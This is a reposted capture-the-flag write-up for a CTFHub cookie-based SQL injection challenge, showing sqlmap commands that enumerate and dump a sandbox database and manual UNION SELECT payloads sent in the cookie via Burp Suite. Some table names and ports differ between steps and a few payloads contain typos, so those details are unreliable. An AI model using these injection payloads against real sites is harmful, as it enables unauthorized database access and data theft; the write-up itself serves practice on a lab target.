实用工具小学数学练习字帖生成在线画板函数绘制拼音字母表在线词典黄历查询中国历史 Excel函数模拟请求 json格式化

栏目分类:

子分类:

名师互学网

名师互学网用户登录

快速导航

当前搜索

当前分类

前沿技术软件开发系统运维产品运营生活办公面试经验考试题库

实用工具

学习工具小学数学练习字帖生成在线画板函数绘制拼音字母表在线词典黄历查询亲戚关系计算安全期计算中国历史 Excel函数模拟请求 json格式化浏览器指纹

名师互学网 > IT > 软件开发 > 后端开发 > Python

CTFHUB技能树-WEB-SQL注入-Cookie注入的WP

Python 更新时间：2026-03-31 02:04:17 发布时间：1616天前 IT归档最新发布模块sitemap 名妆网法律咨询聚返吧英语巴士网伯小乐网商动力

我们将使用两种解法——sqlmap自动注入以及利用burpsuite工具手工注入

一：sqlmap自动注入

首先在命令行换到sqlmap目录下，然后开始解题

先爆当前数据库信息

python sqlmap.py -u "http://challenge-6b420c7b04e13f9f.sandbox.ctfhub.com:10800/" --cookie "id=1" --dbs --level 2

爆出库名为'sqli'

接下来查选表名，得到表名为'hzyddqchqe'


python sqlmap.py -u "http://challenge-6b420c7b04e13f9f.sandbox.ctfhub.com:10800/" --cookie "id=1" -D sqli --tables --level 2

然后查选列名及内容

python sqlmap.py -u "http://challenge-6b420c7b04e13f9f.sandbox.ctfhub.com:10080" --cookie "id=1" -D sqli -T frkadyqcec --columns --dump --level 2

就得到flag了

二：利用burpsuite工具手动注入

使用burpsuite工具抓包，在cookie值处输入语句进行注入

先输入以下语句，查看页面回显位

cookie:id=-1 union select1,2;

结果显示

然后求数据库名

id=-1 union select 1,dataase()

得到数据库名为'sqli'

接着求表名，结果为'xujnpmahoo'

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

继续求列名,结果为'ygngmcsynj'


id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='xujnpmahoo'

最后求字段值，即可得到flag


id=-1 union select 1,group_concat(ygngmcsynj) from sqli.xujnpmahoo

转载请注明：文章转载自 www.mshxw.com

本文地址：https://www.mshxw.com/it/348286.html

上一篇 BugKU-web-Simple

下一篇 “21天养成好习惯”第一期-3

Python相关栏目本月热门文章

热门相关搜索

路由器设置木托盘宝塔面板儿童python教程心情低落朋友圈 vim 双一流学科专升本我的学校日记学校西点培训学校汽修学校情书化妆学校塔沟武校异形模板西南大学排名最精辟人生短句 6步教你追回被骗的钱南昌大学排名清朝十二帝北京印刷学院排名北方工业大学排名北京航空航天大学排名首都经济贸易大学排名中国传媒大学排名首都师范大学排名中国地质大学(北京)排名北京信息科技大学排名中央民族大学排名北京舞蹈学院排名北京电影学院排名中国戏曲学院排名河北政法职业学院排名河北经贸大学排名天津中德应用技术大学排名天津医学高等专科学校排名天津美术学院排名天津音乐学院排名天津工业大学排名北京工业大学耿丹学院排名北京警察学院排名天津科技大学排名北京邮电大学(宏福校区)排名北京网络职业学院排名北京大学医学部排名河北科技大学排名河北地质大学排名河北体育学院排名

关于我们文章归档网站地图联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号：晋ICP备2021003244-6号